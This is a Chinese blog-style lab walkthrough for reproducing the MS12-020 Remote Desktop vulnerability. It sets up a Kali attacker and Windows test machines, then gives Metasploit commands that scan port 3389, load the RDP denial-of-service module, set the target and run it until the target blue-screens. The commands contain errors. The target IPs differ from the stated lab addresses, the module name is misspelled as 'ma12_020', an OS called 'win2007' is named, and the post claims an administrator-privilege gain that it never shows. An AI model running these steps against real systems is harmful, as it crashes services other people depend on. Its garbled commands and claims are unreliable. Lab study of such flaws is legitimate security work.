ms12-020(蓝屏攻击漏洞复现)

ms12-020(蓝屏攻击漏洞复现)ms12-020(蓝屏攻击漏洞复现)

✅作者简介:CSDN内容合伙人、信息安全专业在校大学生🏆
🔥系列专栏 :内网安全-漏洞复现
📃新人博主 :欢迎点赞收藏关注,会回访!
💬舞台再大,你不上台,永远是个观众。平台再好,你不参与,永远是局外人。能力再大,你不行动,只能看别人成功!没有人会关心你付出过多少努力,撑得累不累,摔得痛不痛,他们只会看你最后站在什么位置,然后羡慕或鄙夷。


一、原理

ms12-020漏洞的定义是指操作系统的远程桌面协议存在重大漏洞,入侵者(黑客)可以通过向远程桌面默认端口(3389)发一系列特定RDP包,从而获取超级管理员权限,进而入侵系统,Windows在处理某些RDP报文时Terminal Server 存在错误,可被利用造成服务停止响应(蓝屏)
根据实际被入侵终端进行分析,开放远程桌面服务并使用默认的3389端口的会成为攻击目标。
微软的安全公告:Windows全系列操作系统(WinXP/Vista/Win7/Win2000/ Win2003/Win2008)均存在受控威胁。

二、实验环境

攻击机:kali IP:192.168.204.128
靶机win2003 IP:192. 168.204.159
靶机win2007 IP:192.168.204.160
两者都在同一内网,采用NAT连接方式

三、漏洞复现

1、开启win2003的远程桌面:控制面板–>系统–>远程–>远程协助–>远程桌面
win2007是 计算机–>(右键)属性–>远程设置
ms12-020(蓝屏攻击漏洞复现)
2、控制面板–>windows防火墙–>例外–>远程桌面
ms12-020(蓝屏攻击漏洞复现)
3、用nmap扫描靶机,发现靶机的3389端口已经打开
输入:nmap 192.168.252.159
ms12-020(蓝屏攻击漏洞复现)
4、在kali的终端中打开msfconsole
ms12-020(蓝屏攻击漏洞复现)
5、使用search功能搜索ms12-020,发现有两个可用模块。
输入:search ms12-020
ms12-020(蓝屏攻击漏洞复现)
6、使用第一个可用版模块
输入:use auxiliary/dos/windows/rdp/ma12_020_maxchannelids 或者use 1
ms12-020(蓝屏攻击漏洞复现)
7、利用set命令设置攻击的IP。
输入:set rhosts 192.168.252.160
show options
ms12-020(蓝屏攻击漏洞复现)
8、输入:exploit,执行攻击
ms12-020(蓝屏攻击漏洞复现)
9、看一下靶机,发现靶机蓝屏了
ms12-020(蓝屏攻击漏洞复现)

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
如需转载请保留出处:https://bianchenghao.cn/35274.html

(0)
编程小号编程小号

相关推荐

发表回复

您的电子邮箱地址不会被公开。 必填项已用*标注